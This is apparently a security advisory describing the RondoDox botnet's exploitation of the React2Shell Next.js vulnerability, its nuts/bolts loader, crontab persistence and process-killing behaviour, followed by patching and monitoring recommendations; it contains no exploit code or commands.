The RondoDox botnet is actively exploiting a critical vulnerability tracked as React2Shell (CVE-2025-55182) to compromise exposed web servers and Internet of Things (IoT) devices. The flaw enables unauthenticated remote code execution in vulnerable Next.js and React Server Components (RSC) deployments, facilitating large-scale botnet enrollment and persistent compromise of the system. Observed activity indicates that threat actors are leveraging this vulnerability along with additional weaknesses to deploy modular botnet loaders, cryptocurrency miners, and Mirai-derived malware variants designed to maintain long-term control and suppress competing infections. Organizations operating unpatched React-based applications or exposed IoT infrastructure face elevated risk due to the ongoing, automated exploitation of this vulnerability.
React2Shell (CVE-2025-55182) is a remote code execution vulnerability affecting Next.js and React Server Components (RSC) that arises from improper handling of user-supplied input during server-side request processing. The vulnerability enables unauthenticated attackers to execute arbitrary commands by interacting with exposed application endpoints that do not adequately enforce input validation. With a CVSS score of 10.0, successful exploitation provides attackers with command execution within the context of the vulnerable server process, enabling the deployment of secondary payloads without requiring authentication or elevated privileges.
Exploitation is carried out through crafted HTTP requests sent to susceptible React or Next.js endpoints, resulting in the execution of attacker-controlled commands. RondoDox operators leverage this execution path to deploy follow-on malware components, including botnet agents and cryptocurrency mining payloads, establishing initial access to compromised web servers and Internet of Things (IoT) devices.
Following exploitation, the RondoDox botnet establishes persistence through a staged infection workflow. The observed attack lifecycle begins with reconnaissance and vulnerability identification, followed by automated exploitation and payload delivery. Command-and-control (C2) infrastructure distributes multiple payload types, including a proprietary malware loader referred to as nuts/bolts, along with cryptocurrency mining components used to monetize compromised systems.
The nuts/bolts loader establishes persistence by modifying crontab entries to ensure execution across system reboots. It enforces process-level control by periodically enumerating active processes and terminating non-whitelisted entries, including competing botnet agents and unauthorized cryptocurrency miners. Process enforcement is performed at regular intervals, observed at approximately every 45 seconds in analyzed samples, which suppresses rival infections and increases the likelihood that RondoDox retains exclusive control over compromised hosts.
In addition to persistence mechanisms, RondoDox employs self-protection techniques to reinforce its operational foothold. The nuts/bolts loader regularly monitors the system process list and terminates processes that do not conform to predefined allowlists, reducing the effectiveness of competing malware and interfering with certain defensive tooling. This approach increases the dwell time of the botnet on infected systems.
To expand its operational footprint, the botnet incorporates Mirai-derived malware variants that exploit known vulnerabilities in IoT devices, including routers and embedded systems. After initial compromise, infected hosts are used to scan for additional vulnerable Next.js servers and IoT devices, facilitating continued botnet growth. The combination of proprietary loaders and reused exploitation techniques allows the botnet to adapt its operations and sustain activity across diverse environments.
Threat actors exploit the React2Shell (CVE-2025-55182) vulnerability in exposed Next.js or React Server Components to achieve unauthenticated remote code execution.
• Successful exploitation is followed by the deployment of malicious payloads, including cryptocurrency mining components and a proprietary botnet loader referred to as nuts/bolts.
• The nuts/bolts loader establishes persistence by modifying crontab entries to ensure that core botnet components remain active across system reboots.
• Process-level control is enforced through continuous enumeration and termination of non-whitelisted processes, suppressing competing malware and limiting reinfection by rival operators.
• Compromised systems are subsequently used to identify and exploit additional vulnerable IoT devices and Next.js servers, expanding botnet membership and operational reach.
React2Shell (CVE-2025-55182) presents a low-barrier exploitation pathway due to its unauthenticated nature and the absence of prerequisite access or elevated privileges. The vulnerability can be triggered through crafted HTTP requests targeting exposed application endpoints, enabling automated exploitation at scale. Given the widespread adoption of Next.js and React Server Components across modern web environments, the vulnerability significantly expands the available attack surface. Once exploited, affected systems can be rapidly integrated into botnet infrastructure through automated payload deployment, supporting high-volume and repeatable exploitation campaigns.
The active exploitation of React2Shell (CVE-2025-55182) by the RondoDox botnet underscores the risk posed by unauthenticated remote code execution vulnerabilities in widely deployed web frameworks. By combining automated exploitation with persistent loaders, self-defense mechanisms, and Mirai-derived propagation techniques, RondoDox demonstrates an operational approach focused on scalability, resilience, and long-term control of compromised infrastructure. Organizations operating vulnerable Next.js applications or exposed IoT devices face an increased likelihood of sustained compromise unless mitigations are promptly applied.
The exploitation of React2Shell (CVE-2025-55182) enables RondoDox operators to establish persistent control over affected web servers and Internet of Things (IoT) devices, converting them into nodes for resource hijacking, distributed denial-of-service (DDoS) activity, and cryptocurrency mining. Compromised systems may serve as long-lived points of attack, increasing the likelihood of sustained operational disruption and unauthorized infrastructure use. The botnet’s ability to propagate laterally, suppress competing malware, and reduce forensic visibility extends the potential impact across interconnected environments, elevating the risk of broader infrastructure abuse and reputational damage for affected organizations.
• Apply vendor-provided patches and updates to all vulnerable Next.js and React Server Components deployments to mitigate exploitation of React2Shell (CVE-2025-55182). Implement network segmentation controls to isolate IoT devices and exposed application servers, reducing the potential for lateral movement following compromise.
• Deploy Web Application Firewalls (WAFs) configured to detect and block exploitation attempts targeting known remote code execution vectors.
• Monitor systems for indicators of compromise, including unauthorized crontab modifications, abnormal process termination patterns, and unexpected resource utilization consistent with botnet or cryptocurrency mining activity.
• Block outbound communication with known RondoDox command-and-control (C2) infrastructure and proactively hunt for network traffic patterns indicative of botnet activity.
• Conduct regular vulnerability assessments and hardening of exposed web servers and IoT devices to reduce the likelihood of future exploitation.
https://www.trendmicro.com/en/research/25/l/CVE-2025-55182-analysis-poc-itw.html
